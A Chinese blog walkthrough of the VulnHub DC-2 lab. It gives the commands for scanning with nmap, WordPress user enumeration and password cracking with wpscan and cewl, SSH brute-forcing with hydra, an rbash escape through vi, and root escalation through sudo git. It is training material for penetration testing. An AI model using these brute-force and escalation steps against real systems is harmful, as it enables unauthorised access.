vulnhub靶机练习--DC2

最新推荐文章于 2024-02-13 19:50:14 发布
最新推荐文章于 2024-02-13 19:50:14 发布
阅读量331 收藏
点赞数
分类专栏: vulnhub靶机练习 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34516733/article/details/119815450
版权

DC-2

总结:
nmap:探测存活主机、扫描开放的端口
域名解析:修改hosts文件
nikto:扫描网站结构
wpscan:扫描网站,获取可以登录网站的用户名;爆破可以登录用户的密码
cewl:生成密码字典
hydra:ssh登录密码爆破

vi提权:
用vi的:set shell=/bin/bash
: shell
之后 export -p 查看发现PATH变量可以写入
export PATH=$PATH:/bin/

git提权:
sudo git -p –-help
sudo git help config后输入!/bin/bash可成功提权

相关知识:
wordpress
wpscan
cewl
rbash

靶机详情

靶机地址:https://www.vulnhub.com/entry/dc-2,311/
靶机描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag
在这里插入图片描述

与 DC-1 非常相似,DC-2 是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。

与最初的 DC-1 一样,它的设计考虑到了初学者。

必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。

就像 DC-1 一样,有五个标志,包括最终标志。

再一次,就像 DC-1 一样,标志对初学者很重要,但对有经验的人来说并不那么重要。

简而言之,唯一真正重要的标志是最终标志。

对于初学者,谷歌是你的朋友。好吧,除了所有隐私问题等等。

我还没有探索获得 root 的所有方法,因为我放弃了我一直在研究的以前的版本,并且除了基本的操作系统安装之外完全重新开始。

靶机练习

1、nmap -sP 192.168.77.0/24探测存活主机
在这里插入图片描述
130是kali,因此靶机IP为133

2、nmap扫描端口
nmap -A -T4 -p- 192.168.77.133
在这里插入图片描述
发现80(http)、7744(ssh)端口

浏览器访问http://192.168.220.133,发现无法正常访问页面,但在url地址栏会有http://dc-2域名提示,发现问题是本地无法解析域名dc-2
在这里插入图片描述
编辑/etc/hosts文件,添加靶机IP地址及对应域名:192.168.77.133 dc-2
在这里插入图片描述
在这里插入图片描述

由于我是在windows上打开的浏览器,因此需修改C:\Windows\System32\drivers\etc下的hosts文件
在这里插入图片描述
flag1
修改后,可以正常访问网页信息,并能在Flag页面找到flag1
在这里插入图片描述
在这里插入图片描述
提示使用cewl密码字典生成工具,并且在登录后可以找到下一个flag
下拉在页面下方可以看的 这是一个wordpress站点
在这里插入图片描述

flag1提示可以登录,但正常访问网页无法找到登录页面,所以使用nikto工具扫描网站结构,找到wp-login.php登录页面
nikto -h dc-2 -o nikto-dc2.txt
cat dc-2.nikto
在这里插入图片描述
访问登录页面:http://dc-2/wp-login.php
在这里插入图片描述
一般WordPress网站都会有admin用户,但需要爆破密码

使用wpscan工具扫描网站,获取可以登录网站的用户名,扫描后可以找到三个用户名:admin、tom、jerry
wpscan --url dc-2 -e u
在这里插入图片描述
在这里插入图片描述
将扫描到的三个用户名添加到dc-2users.list
在这里插入图片描述
在这里插入图片描述
使用flag1中提示的工具cewl生成密码字典dc-2pass.dic
cewl dc-2 -w dc-2.dic
在这里插入图片描述
使用wpscan工具爆破可以登录用户的密码,可成功爆破tom和jerry用户

wpscan --url dc-2 -U dc-2users.list -P dc-2.dic
Username: jerry, Password: adipiscing
Username: tom, Password: parturient

在这里插入图片描述
在这里插入图片描述
flag2
使用jerry登录后找到flag2
在这里插入图片描述
If you can’t exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.

如果你不能利用WordPress并抄近路,还有别的办法。
希望你能找到另一个切入点。

Flag2提示从另外一个方向切入,所以80端口切入失败,这时用到另外一个7744(ssh)端口

使用hydra工具使用已生成的密码字典对已知的用户名进行ssh登录密码爆破,获得ssh登录用户:tom / parturient

hydra -L dc-2users.list -P dc-2.dic 192.168.220.132 ssh -s 7744
在这里插入图片描述
使用tom用户ssh登录
ssh tom@192.168.220.132 -p 7744
在这里插入图片描述
cat flag3
在这里插入图片描述
rbash(restricted bash),即受限制的 bash。其可以用作中转服务器,或者仅使用 ssh 来访问网页等等。

flag3
vi flag3.txt
在这里插入图片描述
tom权限受限,只能使用less、ls、scp、vi命令,无法直接使用su命令切换用户

用vi的:set shell=/bin/bash
: shell
之后 export -p 查看发现PATH变量可以写入
export PATH=$PATH:/bin/

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这样就可以使用全部命令了,查看/etc/passwd发现除了tom还有jerry,利用之前得到的信息切换jerry看看
在这里插入图片描述
在这里插入图片描述
flag4
找到flag4
在这里插入图片描述
提示使用git命令提权

sudo -l #查看可以使用root权限无密码的命令,有git命令
sudo git -p –-help #提权
在这里插入图片描述
sudo git help config后输入!/bin/bash可成功提权
可参考:https://www.cnblogs.com/zaqzzz/p/12075132.html
在这里插入图片描述
final-flag
root家目录下找到最后的flag
在这里插入图片描述

keira_lu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub之DC2
qq_54030686的博客
05-31 216
简述:各位兄弟可移步至https://blog.csdn.net/shuteer_xu/article/details/116141639,直接看这位师傅的即可,本人只当成一个笔记 老三样,主机发现,端口扫描,指纹识别 主机发现 nmap -sS 192.168.43.0/24 全端口扫描 nmap -A -p- 192.168.43.130 共发现 7744为ssh端口处于开放状态,使用hydra进行爆破,使用 hydra -L /opt/user.txt -P /opt/mima.txt ss
vulnhub--DC2
weixin_55129870的博客
05-12 1260
环境:kali、DC2靶机 DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式) ifconfig查看kaliIP地址:192.168.44.131 查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中, 得知网段192.168.44.0/24,使用nmap扫描存活主机 nmap -sP 192.168.44.0/24 #扫描IP段的所有IP地址 一般都会扫描出5个存活主机,出去较大的,较小的,得知.
vulnhub之DC2靶机
LainWith的博客
08-16 1450
靶机概览信息收集nmap信息收集网站信息收集Flag1爬站目录扫描列出站点的用户名、账号渗透攻击爆破后台访问网站Flag2爆破ssh登录ssh绕过rbash拿flag3拿下jerry拿下flag4提权git提权flag5 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机.
玩转靶机Vulnhub:DC2(详细)
weixin_51566481的博客
07-26 1041
dc2,suid提权,rbash逃逸
Vulnhub-dc2学习笔记
weixin_42820274的博客
01-18 858
Vulnhub-dc2学习笔记1.NMAP扫描子网2.改hosts文件访问80端口http2.1使用cewl获取密码字典2.2使用WPscan获取用户名2.3 使用wpscan爆破密码2.4 按照提示登录获取下一个线索3.尝试使用用户名密码ssh登录4.Git提权 1.NMAP扫描子网 发现靶机IP,有80端口,ssh端口改成了7744 2.改hosts文件访问80端口http 打开web页面发...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
过受限制的/bin/bash-rbash(vi法和PATH法)
qq_45290991的博客
08-07 519
rbash绕过 一、前言 在进行dc-2的靶场渗透时遇到了rbash受限,查阅了大佬们写的笔记了解一下原理,做一下总结好让自己更好的理解掌握。 首先我们要知道为什么要进行rbash绕过,rbash是受限的shell的一种此外还有rbash、rksh和rsh,为什么要对shell进...
对DC-2靶机进行渗透测试
zll___的博客
03-11 750
对DC-2靶机进行渗透测试
靶机实战(DC-2)
weixin_45605313的博客
06-28 258
DC-2实验环境实验过程主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机:DC-2 测试机:kali(IP:192.168.186.128),win10 实验过程 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p 0-65535 --rate=100000 192.168.186.248
DC系列:2(DC-2靶机 初阶渗透详细)
jrdh的博客
11-27 2707
DC-2靶机环境搭建详情:描述使用工具一.信息收集基础信息查询0x01 查看存活主机0x02 查看开放端口0x03 查看端口服务0x04 扫描网站根目录及指纹信息二.漏洞发现访问开放网页0x01解决重定向问题0x02 flag1cewl创建password字典0x03wpscan爆破用户名及密码0x04登录后台三.漏洞利用远程连接0x01ssh远程登录0x02突破rbash限制0x03添加环境变量0x04 flag3四.提权flag4总结 环境搭建 详情: 名称 DC- 2 发布日期 201
[渗透测试篇]Vulnhub靶机DC-2
qq_43668710的博客
05-11 432
文章目录靶机描述实验环境渗透思路获取目标IP(netdiscover)端口扫描(nmap)生成密码(cewl)获取用户名(wpscan)暴力破解(hydra)登录后台全端口扫描/SSH登录逃脱受限shell/导入$PATHgit 提权知识总结DC-系列 靶机描述 共有五个标志,包括最终标志.任务就是跟着逐一放出的flag提示拿到最终的flag. 实验环境 攻击机:kali 目标机:DC-2 涉及工具: 'netdiscover':获取目标IP 'nmap':信息收集/端口扫描/Web服务判断 'cewl
Vulnhub靶机渗透学习——DC-2
qq_45612828的博客
10-18 270
wpscan工具使用(wordpress 靶场以及实际中非常常见)rbash 逃逸并提权(vi 进入 /bin/sh, 更改环境变量)学会 git 提权。
Vulnhub靶机:DC2
最新发布
qq_48904485的博客
02-13 382
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:DC2(10.0.2.55)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/
vulnhub通关-2 DC-2(含靶场资源)
Brucye
02-01 904
WPScan是一个开源的网络安全工具,专门用于发现WordPress网站中的安全漏洞。BASH_CMD通常不是一个标准的环境变量。不过,如果你在某些脚本或配置文件中看到BASH_CMD,它可能是一个自定义的环境变量用于存储一个bash命令或者命令的路径。这个变量的具体含义和用途取决于它在脚本或配置中的上下文。命令解释:export 用于添加环境变量,su在/bin目录下,所以添加/bin目录。
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4712
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值